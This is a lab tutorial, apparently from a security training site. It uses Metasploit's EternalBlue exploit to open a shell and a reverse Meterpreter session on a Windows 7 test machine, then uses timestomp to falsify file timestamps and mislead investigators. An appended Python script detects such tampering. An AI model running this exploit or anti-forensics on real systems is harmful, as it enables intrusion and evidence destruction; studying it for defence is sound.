Metasploit can be used in various ways to exploit Windows vulnerabilities. Metasploit, the most popular framework among pentesters and security researchers, is capable of attacking any Windows operating system platform. It provides multiple exploits and modules to test and exploit Windows.

We will demonstrate the timestomp module in Metasploit, with which an attacker can change the file attributes of any file on a Windows machine. File attributes are the metadata associated with files in Windows; this metadata records the creation, modification and write date and time of a file. According to an ethical hacking researcher at the International Institute of Cyber Security, Metasploit has really helped the security community in its day-to-day work.

MACE Values

MACE (Modified, Accessed, Created, Entry modified) timestamps are recognized as file attributes. They show the date and time of any file on a Windows machine. File attributes are routinely examined by IT administrators during forensic investigations. We will show how the timestomp module can be used to change the file attributes of any file on a Windows operating system.

We will use two operating systems. On the attacker side we will use Kali Linux 2018.4 amd64. On the victim side we will use Windows 7 Build 7600 64-bit with Windows Firewall and Defender disabled.

Open a terminal in Kali Linux.

Type msfconsole. To test timestomp we will use an SMB (Server Message Block) exploit to attack the victim machine. SMB is used in many scenarios, such as printer sharing, accessing Windows remote services, and other services built on SMB.

# msfconsole

       =[ metasploit v4.17.17-dev                         ]
+ -- --=[ 1817 exploits - 1031 auxiliary - 315 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > options

Type set RHOST 192.168.1.6 (the victim IP address).

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.1.6
RHOST => 192.168.1.6
msf exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.6      yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.

Type run.

msf exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.6:445 - Connecting to target for exploitation.
[+] 192.168.1.6:445 - Connection established for exploitation.
[+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.6:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.6:445 - 0x00000010  74 65 20 37 36 30 30                             te 7600
[+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.6:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.6:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.6:445 - Starting non-paged pool grooming
[+] 192.168.1.6:445 - Sending SMBv2 buffers
[+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.6:445 - Sending final SMBv2 buffers.
[*] 192.168.1.6:445 - Sending last fragment of exploit packet!
[*] 192.168.1.6:445 - Receiving response from exploit packet
[+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.6:445 - Sending egg to corrupted connection.
[*] 192.168.1.6:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.4:4444 -> 192.168.1.6:58238) at 2020-01-17 23:50:10 -0500
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Users\iics\Desktop\iicybersecurity
cd C:\Users\iics\Desktop\iicybersecurity

C:\Users\iics\Desktop\iicybersecurity>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9E30-BB33

 Directory of C:\Users\iics\Desktop\iicybersecurity

01/18/2020  10:18 AM    <DIR>          .
01/18/2020  10:18 AM    <DIR>          ..
01/18/2020  10:19 AM               172 iicybersecurity.rar
01/18/2020  10:18 AM                21 iicybersecurity.txt
01/18/2020  10:18 AM                19 testfile.txt
               3 File(s)            212 bytes
               2 Dir(s)  40,536,866,816 bytes free

While attacking with Metasploit, the command shell sometimes does not respond properly. To resolve this, type exit and press Enter, then type y when asked whether to background the session.

C:\Windows\system32>exit
exit
help

Meta shell commands
===================

    Command     Description
    -------     -----------
    help        Help menu
    background  Backgrounds the current shell session
    sessions    Quickly switch to another session
    resource    Run the commands stored in a file
    shell       Spawn an interactive shell (*NIX Only)
    download    Download files (*NIX Only)
    upload      Upload files (*NIX Only)

Background session 7? [y/N]  y
msf exploit(windows/smb/ms17_010_eternalblue) >

Here the attacker needs a Meterpreter session, since timestomp is a Meterpreter command. To get one, type set payload windows/x64/meterpreter/reverse_tcp.

Type exploit; this opens a Meterpreter session on the victim machine.

msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.6:445 - Connecting to target for exploitation.
[+] 192.168.1.6:445 - Connection established for exploitation.
[+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.6:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.6:445 - 0x00000010  74 65 20 37 36 30 30                             te 7600
[+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.6:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.6:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.6:445 - Starting non-paged pool grooming
[+] 192.168.1.6:445 - Sending SMBv2 buffers
[+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.6:445 - Sending final SMBv2 buffers.
[*] 192.168.1.6:445 - Sending last fragment of exploit packet!
[*] 192.168.1.6:445 - Receiving response from exploit packet
[+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.6:445 - Sending egg to corrupted connection.
[*] 192.168.1.6:445 - Triggering free of corrupted buffer.
[-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.6:445 - Connecting to target for exploitation.
[+] 192.168.1.6:445 - Connection established for exploitation.
[+] 192.168.1.6:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.6:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.6:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.6:445 - 0x00000010  74 65 20 37 36 30 30                             te 7600
[+] 192.168.1.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.6:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.6:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.6:445 - Starting non-paged pool grooming
[+] 192.168.1.6:445 - Sending SMBv2 buffers
[+] 192.168.1.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.6:445 - Sending final SMBv2 buffers.
[*] 192.168.1.6:445 - Sending last fragment of exploit packet!
[*] 192.168.1.6:445 - Receiving response from exploit packet
[+] 192.168.1.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.6:445 - Sending egg to corrupted connection.
[*] 192.168.1.6:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.1.6
[*] Meterpreter session 8 opened (192.168.1.4:4444 -> 192.168.1.6:55800) at 2020-01-18 00:33:38 -0500
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

Type timestomp help.

meterpreter > timestomp help

Usage: timestomp <file(s)> OPTIONS

OPTIONS:

    -a <opt>  Set the "last accessed" time of the file
    -b        Set the MACE timestamps so that EnCase shows blanks
    -c <opt>  Set the "creation" time of the file
    -e <opt>  Set the "mft entry modified" time of the file
    -f <opt>  Set the MACE of attributes equal to the supplied file
    -h        Help banner
    -m <opt>  Set the "last written" time of the file
    -r        Set the MACE timestamps recursively on a directory
    -v        Display the UTC MACE values of the file
    -z <opt>  Set all four attributes (MACE) of the file

Type ls, then type cd iicybersecurity.

meterpreter > ls
Listing: C:\
============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2019-08-23 01:33:26 -0400  $Recycle.Bin
40777/rwxrwxrwx   0      dir   2009-07-14 01:08:56 -0400  Documents and Settings
40777/rwxrwxrwx   0      dir   2009-07-13 23:20:08 -0400  PerfLogs
40555/r-xr-xr-x   8192   dir   2019-12-27 02:20:34 -0500  Program Files
40555/r-xr-xr-x   8192   dir   2019-12-27 02:20:04 -0500  Program Files (x86)
40777/rwxrwxrwx   4096   dir   2019-12-17 05:43:04 -0500  ProgramData Clean.rar
40777/rwxrwxrwx   4096   dir   2020-01-16 06:37:21 -0500  System Volume Information
40555/r-xr-xr-x   4096   dir   2019-08-23 01:33:18 -0400  Users
40777/rwxrwxrwx   16384  dir   2020-01-18 00:38:27 -0500  Windows
40777/rwxrwxrwx   0      dir   2020-01-17 23:48:58 -0500  iicybersecurity
0000/---------    0      fif   1969-12-31 19:00:00 -0500  pagefile.sys

meterpreter > cd iicybersecurity
meterpreter > ls
Listing: C:\iicybersecurity
===========================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  172   fil   2020-01-17 23:49:00 -0500  iicybersecurity.rar
100666/rw-rw-rw-  21    fil   2020-01-17 23:48:31 -0500  iicybersecurity.txt
100666/rw-rw-rw-  19    fil   2020-01-17 23:48:44 -0500  testfile.txt

Type timestomp iicybersecurity.txt -v. This command shows the details of the file together with its file attributes: -v displays the UTC MACE values of the file, which here all fall around 2020-01-17 23:48.

meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.txt
Modified      : 2020-01-17 23:48:31 -0500
Accessed      : 2020-01-17 23:47:38 -0500
Created       : 2020-01-17 23:47:38 -0500
Entry Modified: 2020-01-17 23:58:49 -0500
meterpreter >

From here the attacker changes the file attributes to make IT administrators believe that none of the files has been accessed, since checking file attributes is always the first step an IT administrator takes. In such cases, the Digital Forensics courses offered by the International Institute of Cyber Security help IT administrators understand the procedure for carrying out forensics after any such hacking activity.

Changing Accessed Time of File

To change the accessed time of the file, type:

meterpreter > timestomp iicybersecurity.rar -a "02/11/2008 08:34:08"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter >

Type timestomp iicybersecurity.rar -v to verify: the accessed time of the file has changed to 2008-02-11 08:34:08.

meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified      : 2020-01-17 23:49:00 -0500
Accessed      : 2008-02-11 08:34:08 -0500
Created       : 2020-01-17 23:48:58 -0500
Entry Modified: 2020-01-17 23:58:49 -0500

Changing Creation Time

Type timestomp iicybersecurity.rar -c "02/11/2000 08:34:10"

Then type timestomp iicybersecurity.rar -v

meterpreter > timestomp iicybersecurity.rar -c "02/11/2000 08:34:10"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified      : 2020-01-17 23:49:00 -0500
Accessed      : 2008-02-11 08:34:08 -0500
Created       : 2000-02-11 08:34:10 -0500
Entry Modified: 2020-01-17 23:58:49 -0500

The output above shows that the creation time of the file has changed.

Changing MFT Entry Modified Time

Type timestomp iicybersecurity.rar -e "02/05/2014 08:34:10"

Then type timestomp iicybersecurity.rar -v

meterpreter > timestomp iicybersecurity.rar -e "02/05/2014 08:34:10"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified      : 2020-01-17 23:49:00 -0500
Accessed      : 2008-02-11 08:34:08 -0500
Created       : 2000-02-11 08:34:10 -0500
Entry Modified: 2014-02-05 08:34:10 -0500

Changing All File Attributes

Type timestomp iicybersecurity.rar -z "02/05/2014 08:34:10"

Then type timestomp iicybersecurity.rar -v

meterpreter > timestomp iicybersecurity.rar -z "02/05/2014 08:34:10"
[*] Setting specific MACE attributes on iicybersecurity.rar
meterpreter > timestomp iicybersecurity.rar -v
[*] Showing MACE attributes for iicybersecurity.rar
Modified      : 2014-02-05 08:34:10 -0500
Accessed      : 2014-02-05 08:34:10 -0500
Created       : 2014-02-05 08:34:10 -0500
Entry Modified: 2014-02-05 08:34:10 -0500
meterpreter >
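The timestomp -a, -c, -e and -z runs above each leave a different inconsistency in the four $STANDARD_INFORMATION values that an investigator can test for. The following script is an added example, not part of the original post: it parses listings in the "timestomp -v" format shown above (constructed here from the page's values) and reports the indicators a forensic analyst would check; the $FILE_NAME creation time it compares against is an assumed value taken from a separate MFT parse, since timestomp rewrites only $STANDARD_INFORMATION.

```python
# Added example: flag manipulated $STANDARD_INFORMATION (SI) timestamps from a
# Meterpreter "timestomp <file> -v" listing. Assumption: fn_created is the
# $FILE_NAME creation time obtained from an MFT parser (not shown on the page).
import re
from datetime import datetime

MACE_RE = re.compile(
    r"^\s*(Entry Modified|Modified|Accessed|Created)\s*:\s*"
    r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})", re.M)

# Constructed from the -v output after the "-a" step above.
SAMPLE_AFTER_A = """\
[*] Showing MACE attributes for iicybersecurity.rar
Modified      : 2020-01-17 23:49:00 -0500
Accessed      : 2008-02-11 08:34:08 -0500
Created       : 2020-01-17 23:48:58 -0500
Entry Modified: 2020-01-17 23:58:49 -0500
"""
# Assumed $FILE_NAME creation time for the .rar (matches its untouched SI value).
FN_CREATED = datetime.strptime("2020-01-17 23:48:58 -0500", "%Y-%m-%d %H:%M:%S %z")


def parse_mace(listing):
    """Parse the four MACE lines of a 'timestomp -v' listing into {name: aware datetime}."""
    mace = {k: datetime.strptime(v, "%Y-%m-%d %H:%M:%S %z")
            for k, v in MACE_RE.findall(listing)}
    if len(mace) != 4:
        raise ValueError("expected 4 MACE values, found %d" % len(mace))
    return mace


def timestomp_indicators(si, fn_created=None):
    """Return the reasons an SI timestamp set looks manipulated (empty list = nothing found)."""
    m, a, c, e = (si[k] for k in ("Modified", "Accessed", "Created", "Entry Modified"))
    reasons = []
    # "-z" writes one value into all four; weak on its own, since a fresh untouched
    # file also matches at second resolution, so treat it as corroborating evidence.
    if m == a == c == e:
        reasons.append("all four MACE values identical (timestomp -z pattern)")
    # NTFS cannot record an access before the file existed ("-a" step).
    if a < c:
        reasons.append("accessed before created")
    # The MFT entry is touched on every create/write, so E is never older than C or M.
    if c > e or m > e:
        reasons.append("MFT entry modified earlier than created/modified")
    # $FILE_NAME is not rewritten by timestomp, so SI created < FN created exposes "-c".
    if fn_created is not None and c < fn_created:
        reasons.append("$SI created earlier than $FILE_NAME created")
    return reasons
```

The "-c" step is only caught by the $FILE_NAME comparison, which is why MFT-level tooling rather than the SI view alone is needed in an investigation.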